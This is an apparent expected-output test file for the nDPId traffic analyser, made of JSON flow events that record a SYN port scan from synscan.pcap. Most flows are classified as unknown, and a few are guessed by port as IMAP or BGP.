+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00791{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
